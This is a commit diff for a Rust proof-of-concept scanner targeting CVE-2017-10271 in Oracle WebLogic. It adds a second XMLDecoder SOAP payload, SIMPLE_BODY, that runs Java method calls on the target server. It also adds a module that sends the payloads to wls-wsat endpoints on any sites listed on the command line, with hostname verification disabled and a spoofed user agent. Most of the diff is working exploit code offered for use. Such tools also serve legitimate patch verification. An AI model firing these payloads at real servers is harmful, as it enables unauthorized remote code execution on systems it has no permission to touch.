Add 1 use case & 1 target url

Cargo.toml

@@ -1,10 +1,12 @@
 [package]
 name = "cve-2017-10271-poc"
-version = "0.2.0"
+version = "0.3.0"
 authors = ["刘安 <[email protected]>"]
 license = "GPL-3.0"
 
 [dependencies]
+itertools = "*"
 lazy_static = "*"
 reqwest = "*"
-termcolor = "*"
+termcolor = "*"
+version = "*"

src/constant.rs

@@ -1,4 +1,4 @@
-pub const BODY: &str = r#"<?xml version="1.0" encoding="utf-8"?>
+pub const EXEC_BODY: &str = r#"<?xml version="1.0" encoding="utf-8"?>
 <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
     <soapenv:Header>
         <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
@@ -37,9 +37,33 @@ pub const BODY: &str = r#"<?xml version="1.0" encoding="utf-8"?>
 </soapenv:Envelope>
 "#;
 
+pub const SIMPLE_BODY: &str = r#"<?xml version="1.0" encoding="utf-8"?>
+<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
+    <soapenv:Header>
+        <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
+            <java>
+                <void class="java.lang.Thread" method="currentThread">
+                    <void method="getCurrentWork">
+                        <void method="getResponse">
+                            <void method="getServletOutputStream">
+                                <void method="print">
+                                    <string>bitcoincash:qp0k3flm8y5rpymkpc0wzphdev5np47xvu8wdxewrh</string>
+                                </void>
+                                <void method="flush"/>
+                            </void>
+                            <void method="getWriter"><void method="write"><string></string></void></void>
+                        </void>
+                    </void>
+                </void>
+            </java>
+        </work:WorkContext>
+    </soapenv:Header>
+    <soapenv:Body/>
+</soapenv:Envelope>"#;
+
 pub const VULNER_TEXT: &str = r#"bitcoincash:qp0k3flm8y5rpymkpc0wzphdev5np47xvu8wdxewrh"#;
-pub const DONATE: &str = VULNER_TEXT;
 
+pub const DONATE: &str = VULNER_TEXT;
 pub const USAGE: &str = r#"cve-2017-10271-poc <site1> <site2> ..."#;
 pub const EXAMPLE: &str = r#"
 cve-2017-10271-poc http://www.site1.com http://www.site1.com:8080 https://site2.net:9090/weblogic
@@ -49,3 +73,5 @@ Above case will test weather vulner for
     http://www.site1.com:8080/wls-wsat/CoordinatorPortType
     http://www.site1.com:8080/wls-wsat/CoordinatorPortType
 "#;
+
+pub const USER_AGENT: &str = "Mozilla/5.0 (X11; Fedora; Linux mips64; rv:59.0) Gecko/20100101 Firefox/59.0";

src/main.rs

@@ -1,18 +1,18 @@
 #[macro_use]
+extern crate itertools;
+#[macro_use]
 extern crate lazy_static;
 extern crate reqwest;
 extern crate termcolor;
+#[macro_use]
+extern crate version;
 
-use reqwest::header;
-use reqwest::Client;
 use std::env;
-use std::error::Error;
-use std::result::Result;
-use std::time::Duration;
 use termcolor::{Color, ColorSpec};
 
 mod constant;
 mod term;
+mod vulnerable;
 
 fn main() {
     welcome();
@@ -21,26 +21,26 @@ fn main() {
 
 fn run() {
     let term = term::TERM.clone();
-    let mut vulner_spec = ColorSpec::new();
-    let mut not_vulner_spec = ColorSpec::new();
-    let mut err_spec = ColorSpec::new();
-    vulner_spec.set_fg(Some(Color::Red)).set_bold(true);
-    not_vulner_spec.set_fg(Some(Color::Green)).set_bold(true);
-    err_spec.set_bg(Some(Color::Magenta));
     let mut nargs = 0;
     term.set_default_color(Some(Some(Color::Blue)), None, Some(true));
     for url in env::args() {
         nargs += 1;
         if nargs == 1 {
             continue;
         }
-        term.out(&url);
-        term.out(": ");
-        let url = format!("{}/wls-wsat/CoordinatorPortType", url);
-        match test_site(&url) {
-            Ok(true) => term.cout("Vulnerable\n", &vulner_spec),
-            Ok(false) => term.cout("Not Vulnerable\n", &not_vulner_spec),
-            Err(e) => term.cout(format!("{}\n", e), &err_spec),
+        match vulnerable::test(&url) {
+            Ok(Some(url)) => {
+                term.out(url);
+                term.cout(" Vulnerable\n", &term::VULNER_SPEC);
+            }
+            Ok(None) => {
+                term.out(format!("{} ", &url));
+                term.cout("Not Vulnerable\n", &term::NO_VULNER_SPEC);
+            }
+            Err(e) => {
+                term.out(format!("{} ", &url));
+                term.cout(format!("{}\n", e), &term::ERR_SPEC);
+            }
         };
     }
     term.set_default_color(Some(None), Some(None), Some(false));
@@ -58,36 +58,13 @@ fn run() {
     }
 }
 
-fn test_site(url: &String) -> Result<bool, Box<Error>> {
-    let mut response = Client::builder()
-        .danger_disable_hostname_verification()
-        .timeout(Some(Duration::from_secs(10)))
-        .build()?
-        .post(url)
-        .header(header::UserAgent::new(
-            "Mozilla/5.0 (X11; Fedora; Linux mips64; rv:59.0) Gecko/20100101 Firefox/59.0",
-        ))
-        .header(header::ContentType::xml())
-        .body(constant::BODY)
-        .send()?;
-    let response = if !response.status().is_success() {
-        return Ok(false);
-    } else {
-        response.text()?
-    };
-    if response.starts_with(constant::VULNER_TEXT) {
-        Ok(true)
-    } else {
-        Ok(false)
-    }
-}
-
 fn welcome() {
     let term = term::TERM.clone();
     term.set_default_color(None, None, Some(true));
-    term.out(
-        "Thank you to use CVE-2017-10271 POC!\nTo help author, Donate ",
-    );
+    term.out(format!(
+        "Thank you to use CVE-2017-10271 POC {}!\nTo help author, Donate ",
+        version!()
+    ));
     cout_donate();
     term.set_default_color(None, None, Some(false));
     term.out("\n\n");

src/term.rs

@@ -65,3 +65,21 @@ impl ColorTerm {
 lazy_static! {
     pub static ref TERM: Arc<ColorTerm> = Arc::new(ColorTerm::new());
 }
+
+lazy_static! {
+    pub static ref VULNER_SPEC: ColorSpec = {
+        let mut spec = ColorSpec::new();
+        spec.set_fg(Some(Color::Red)).set_bold(true);
+        spec
+    };
+    pub static ref NO_VULNER_SPEC: ColorSpec = {
+        let mut spec = ColorSpec::new();
+        spec.set_fg(Some(Color::Green)).set_bold(true);
+        spec
+    };
+    pub static ref ERR_SPEC: ColorSpec = {
+        let mut spec = ColorSpec::new();
+        spec.set_bg(Some(Color::Magenta));
+        spec
+    };
+}

src/vulnerable.rs

@@ -0,0 +1,45 @@
+use reqwest::header;
+use reqwest::{Client, RequestBuilder};
+use std::error::Error;
+use std::time::Duration;
+
+use constant;
+use term;
+
+pub fn test(url: &String) -> Result<Option<String>, Box<Error>> {
+    let address: Vec<&str> = vec!["CoordinatorPortType", "CoordinatorPortType11"];
+    let test_body: Vec<&str> = vec![constant::EXEC_BODY, constant::SIMPLE_BODY];
+    let term = term::TERM.clone();
+    let client = Client::builder()
+        .danger_disable_hostname_verification()
+        .timeout(Some(Duration::from_secs(10)))
+        .build()?;
+    for (addr, body) in iproduct!(address, test_body) {
+        let url = format!("{}/wls-wsat/{}", url, addr);
+        let mut request = client.post(&url);
+        request
+            .header(header::UserAgent::new(constant::USER_AGENT))
+            .header(header::ContentType::xml())
+            .body(body);
+        match try_request(&mut request) {
+            Ok(true) => return Ok(Some(url)),
+            Ok(false) => continue,
+            Err(e) => term.cout(format!("EE! {}\n", e), &term::ERR_SPEC),
+        }
+    }
+    Ok(None)
+}
+
+fn try_request(request: &mut RequestBuilder) -> Result<bool, Box<Error>> {
+    let mut response = request.send()?;
+    let response = if !response.status().is_success() {
+        return Ok(false);
+    } else {
+        response.text()?
+    };
+    if response.starts_with(constant::VULNER_TEXT) {
+        Ok(true)
+    } else {
+        Ok(false)
+    }
+}